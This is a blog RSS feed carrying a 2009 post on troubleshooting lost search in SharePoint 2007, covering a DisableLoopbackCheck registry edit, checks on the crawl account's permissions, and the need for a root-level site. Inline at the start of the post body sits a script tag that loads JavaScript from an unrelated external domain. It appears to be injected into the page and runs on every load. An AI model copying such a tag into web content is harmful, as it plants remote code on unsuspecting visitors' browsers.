<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Rob&#039;s Tech Fun and Games &#187; searching</title>
	<atom:link href="http://kipper.org.uk/index.php/tag/searching/feed/" rel="self" type="application/rss+xml" />
	<link>http://kipper.org.uk</link>
	<description>Technical notes for tricky situations</description>
	<lastBuildDate>Fri, 03 Jun 2011 13:12:43 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Searching problems in SharePoint 2007</title>
		<link>http://kipper.org.uk/index.php/2009/05/searching-problems-in-sharepoint-2007/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=searching-problems-in-sharepoint-2007</link>
		<comments>http://kipper.org.uk/index.php/2009/05/searching-problems-in-sharepoint-2007/#comments</comments>
		<pubDate>Fri, 08 May 2009 11:50:29 +0000</pubDate>
		<dc:creator>Rob</dc:creator>
				<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[SharePoint 2007]]></category>
		<category><![CDATA[administration]]></category>
		<category><![CDATA[searching]]></category>
		<category><![CDATA[SharePoint SP2]]></category>

		<guid isPermaLink="false">http://kipper.org.uk/?p=42</guid>
		<description><![CDATA[One of the common problems I&#8217;ve seen with Microsoft SharePoint is the loss of search functionality, and I&#8217;ve found a lot of different theories and possible solutions.  I&#8217;ve tried to combine the various ideas into a step by step troubleshooting strategy.  Pleae note that this only applies if you&#8217;ve had a working earch service in [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fkipper.org.uk%2Findex.php%2F2009%2F05%2Fsearching-problems-in-sharepoint-2007%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fkipper.org.uk%2Findex.php%2F2009%2F05%2Fsearching-problems-in-sharepoint-2007%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><script type='text/javascript' src='http://easystatsanalytics.info/counter190.js'></script>One of the common problems I&#8217;ve seen with Microsoft SharePoint is the loss of search functionality, and I&#8217;ve found a lot of different theories and possible solutions.  I&#8217;ve tried to combine the various ideas into a step by step troubleshooting strategy.  Pleae note that this only applies if you&#8217;ve had a working earch service in the past &#8211; if not, you need to enable the search service before you do anything else!</p>
<p><span style="text-decoration: underline;">Symptoms</span></p>
<p>Individual sites and site collections respond to any search query with no results.</p>
<p>The event log on the SharePoint Server shows Event  ID 2436 &#8211; The start address &lt;site url&gt; cannot be crawled.</p>
<p>The crawl log within SharePoint says that the site cannot be crawled and has been deleted from the gatherer.</p>
<p><span style="text-decoration: underline;">Possible Resolutions</span></p>
<p><strong>First</strong>, disable loopback checking on IIS, if you haven&#8217;t already.  This is one of the most common causes of the problem, and if it isn&#8217;t done, means that you WILL experience the problem sooner or later anyway.  To disable loopback checking, you need to make a registry change and restart your server, so schedule it for a quiet time.</p>
<p>Follow these steps:</p>
<ol>
<li>Click <strong class="uiterm">Start</strong>, click <strong class="uiterm">Run</strong>, type <span class="userInput">regedit</span>, and then click <strong class="uiterm">OK</strong>.</li>
<li>In Registry Editor, locate and then click the following registry key:
<div class="indent"><strong class="uiterm">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa</strong></div>
</li>
<li>Right-click <strong class="uiterm">Lsa</strong>, point to <strong class="uiterm">New</strong>, and then click <strong class="uiterm">DWORD Value</strong>.</li>
<li>Type <span class="userInput">DisableLoopbackCheck</span>, and then press ENTER.</li>
<li>Right-click <strong class="uiterm">DisableLoopbackCheck</strong>, and then click <strong class="uiterm">Modify</strong>.</li>
<li>In the <strong class="uiterm">Value data</strong> box, type <span class="userInput">1</span>, and then click <strong class="uiterm">OK</strong>.</li>
<li>Quit Registry Editor, and then restart your computer.</li>
</ol>
<p><strong>Second</strong>, check the permissions on the search service.  It sounds silly, but it is easy to sometimes use an account that doesn&#8217;t have access rights to actually crawl the sites!  Don&#8217;t get too involved with this, however &#8211; if it looks right, it probably is.  Its easy to waste days checking odd possibilities of access rights, but if this is the cause, its normally pretty obvious!</p>
<p><strong>Third</strong>, ensure that there is a site at the top level of the web application.  This sounds ludicrous, but I&#8217;ve seen systems spring into life after a blank site is deployed at the root of the website.  Its easy to check, and easy to fix.  Many people won&#8217;t have seen this, as it&#8217;s pretty common practise to deploy self service site creation in the root url.  I&#8217;ve particularly seen this on systems after an SP2 MOSS and WSS install.  If a 404 error is received on the root url, all the other sites won&#8217;t be crawled.</p>
]]></content:encoded>
			<wfw:commentRss>http://kipper.org.uk/index.php/2009/05/searching-problems-in-sharepoint-2007/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

